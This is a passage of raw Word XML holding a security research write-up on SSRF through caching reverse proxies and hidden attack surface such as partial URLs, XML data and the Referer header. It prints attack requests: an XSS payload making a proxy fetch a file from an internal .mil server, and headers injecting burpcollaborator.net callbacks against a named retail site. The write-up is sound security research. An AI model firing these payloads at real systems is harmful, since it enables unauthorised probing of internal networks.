        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Something was evidently scanning responses sent to me for resource imports and fetching them. When it saw something like &lt;img src="/abrams.jpg"/&gt; it would use the host header I supplied to expand the host-relative URL to http://burpcollaborator.net/abrams.jpg and fetch that file, presumably so that it could cache it. I was able to confirm this theory by retrieving the cached response directly from the reverse proxy. This enabled quite an interesting attack - I found reflected XSS in the backend application, and used that to inject a reference to a fake JPG on an internal server in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60C23E" w14:textId="77777777" w:rsidR="00F660F3" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>POST /xss.cgi HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B325E" w14:textId="4D722776" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Content-Length: 103</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xss=&lt;img src="http://internal-server.mil/index.php/fake.jpg"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52180621" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The caching reverse proxy saw this resource import and fetched the 'image', storing it in its cache where I could easily retrieve it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB012DA" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET /index.php/fake.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host: internal-server.mil</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D0207E" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following diagram shows the attack sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B5FD0" w14:textId="68B5E36E" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="text-center"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CFF656B" wp14:editId="47321E01">
            <wp:extent cx="5943600" cy="2793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p>
    <w:p w14:paraId="72176076" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note that the use of XSS to inject an absolute URL means this attack works even if the application rejects requests that contain an unrecognized host header. To aid understanding of this attack I've built a replica of the vulnerable system so that you can </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>try exploiting it yourself</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252415E" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finding hidden attack surface for SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A283B2" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">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lastRenderedPageBreak/>
        <w:t>Many server-side request forgery vulnerabilities are relatively easy to spot, because the application's normal traffic involves request parameters containing full URLs. Other examples of SSRF are harder to locate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3279F" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partial URLs in requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733BE14" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">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Sometimes, an application places only a hostname or part of a URL path into request parameters. The value submitted is then incorporated server-side into a full URL that is requested. If the value is readily recognized as a hostname or URL path, then the potential attack surface might be obvious. However, exploitability as full SSRF might be limited since you do not control the entire URL that gets requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FCB66" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>URLs within data formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAE27E" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">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Some applications transmit data in formats whose specification allows the inclusion of URLs that might get requested by the data parser for the format. An obvious example of this is the XML data format, which has been widely used in web applications to transmit structured data from the client to the server. When an application accepts data in XML format and parses it, it might be vulnerable to </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>XXE injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and in turn be vulnerable to SSRF via XXE. We'll cover this in more detail when we look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>XXE injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACFDED3" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSRF via the Referer header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A449F4" w14:textId="77777777" w:rsidR="00A812FD" w:rsidRPr="00E4142C" w:rsidRDefault="00A812FD" w:rsidP="00A812FD">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Some applications employ server-side analytics software that tracks visitors. This software often logs the Referer header in requests, since this is of particular interest for tracking incoming links. Often the analytics software will actually visit any third-party URL that appears in the Referer header. This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links. As a result, the Referer header often represents fruitful attack surface for SSRF vulnerabilities. See </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Blind SSRF vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> for examples of vulnerabilities involving the Referer header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFE05A" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="630" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:anchor="aux" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Targeting auxiliary systems</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C7ECCF1" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>We've seen significant diversity in reverse proxies and the techniques necessary to make them misroute requests, but the final impact has so far stayed more or less consistent. In this section we'll see that when targeting helper systems like backend analytics and caches, figuring out a genuinely useful exploit is often more difficult than causing a callback in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378907C7" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gathering information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC290C" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unlike routing based attacks, these techniques typically don't hinder websites' normal functionality. Collaborator Everywhere takes advantage of this by injecting numerous distinct attacks into every request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF7D56" w14:textId="77777777" w:rsidR="00CF02DF" w:rsidRPr="00E4142C" w:rsidRDefault="00CF02DF" w:rsidP="00CF02DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host: store.starbucks.ca</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>X-Forwarded-For: a.burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>True-Client-IP: b.burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
